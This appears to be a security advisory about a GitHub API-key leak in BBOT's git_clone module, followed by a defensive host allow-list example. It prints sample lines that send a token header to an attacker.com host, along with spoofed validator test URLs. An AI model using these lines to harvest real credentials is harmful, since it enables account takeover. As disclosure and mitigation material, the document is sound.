How the CVE Works:
The vulnerability exists within BBOT’s `git_clone.py` module. When processing a git repository URL from an untrusted source, the module performs a network operation. Due to improper URL parsing and handling, it is possible to craft a malicious URL that forces the application to send the HTTP request, including the `Authorization` header, to an attacker-controlled web server instead of the intended git service. This header contains the user’s GitHub API key, which is automatically attached from BBOT’s configuration for modules like github_codesearch. The leak occurs during the initial fetch/clone operation before any validation against the expected git platform, exposing the secret credential.
Platform: BBOT
Version: pre-1.1.4
Vulnerability: API Key Leak
Severity: Moderate
Date: 2024-10-09
Prediction: Patch by 2024-10-16
What Undercode Say:
git clone http://attacker.com/malicious/repo.git

# Simulated vulnerable request with the auth header attached (Python)
import requests
malicious_url = "http://attacker.com/malicious/repo.git"
requests.get(malicious_url, headers={'Authorization': 'token ghp_secretkey'})
How the Exploit Works:
Attacker hosts a malicious HTTP server. A victim scans a specially crafted git URL. The BBOT module sends the API key in the authorization header to the attacker’s server during the clone operation.
Protection from this CVE:
Update BBOT to a patched version. Sanitize and validate all input URLs. Use API keys with minimal required permissions. Implement network egress filtering.
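The following is an added example of the "sanitize and validate all input URLs" mitigation; it is not BBOT's code and does not reproduce the patched git_clone.py. It assumes that the GitHub token only ever needs to be presented to github.com and api.github.com, and it decides on the parsed hostname rather than a string prefix, so the Authorization header is withheld for any other host. The sample URLs and the token value are constructed placeholders.

```python
from typing import Dict, Optional
from urllib.parse import urlsplit

# Assumption: the scanner's GitHub token is only valid for these two hosts.
ALLOWED_GIT_HOSTS = frozenset({"github.com", "api.github.com"})


def is_allowed_git_url(url: str) -> bool:
    """Return True only if the URL is HTTPS and its parsed host is allow-listed.

    The host comes from urlsplit().hostname, so URLs that merely contain the
    expected name in the userinfo, path, or a longer domain are rejected.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https":
        return False  # plaintext HTTP would expose the header on the wire anyway
    host = (parts.hostname or "").lower().rstrip(".")
    return host in ALLOWED_GIT_HOSTS


def build_headers(url: str, token: Optional[str]) -> Dict[str, str]:
    """Attach the Authorization header only when the target host is trusted."""
    headers = {"User-Agent": "example-scanner"}  # hypothetical agent string
    if token and is_allowed_git_url(url):
        headers["Authorization"] = f"token {token}"
    return headers


# Constructed validator test inputs; none of these are real repositories.
SAMPLE_URLS = [
    "https://github.com/example-org/example-repo.git",
    "https://api.github.com/repos/example-org/example-repo",
    "http://github.com/example-org/example-repo.git",
    "https://attacker.example/malicious/repo.git",
    "https://github.com@attacker.example/repo.git",
    "https://github.com.attacker.example/repo.git",
]


def audit(urls, token: str = "ghp_EXAMPLE_PLACEHOLDER") -> Dict[str, bool]:
    """Map each URL to whether the token would be sent to it."""
    return {u: "Authorization" in build_headers(u, token) for u in urls}


if __name__ == "__main__":
    for url, sends_token in audit(SAMPLE_URLS).items():
        print(f"{'SEND' if sends_token else 'WITHHOLD':8} {url}")
```

Only the first two sample URLs receive the token; the plaintext-HTTP URL and the three URLs whose real host is not on the allow list get a request without credentials. The egress-filtering advice above complements this check: even if a validator is bypassed, a firewall rule that limits the scanner's outbound HTTPS to the expected git hosts keeps the header from reaching anywhere else.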
Impact:
Credential leakage leading to unauthorized access to private GitHub repositories and associated resources.
Sources:
Reported By: github.com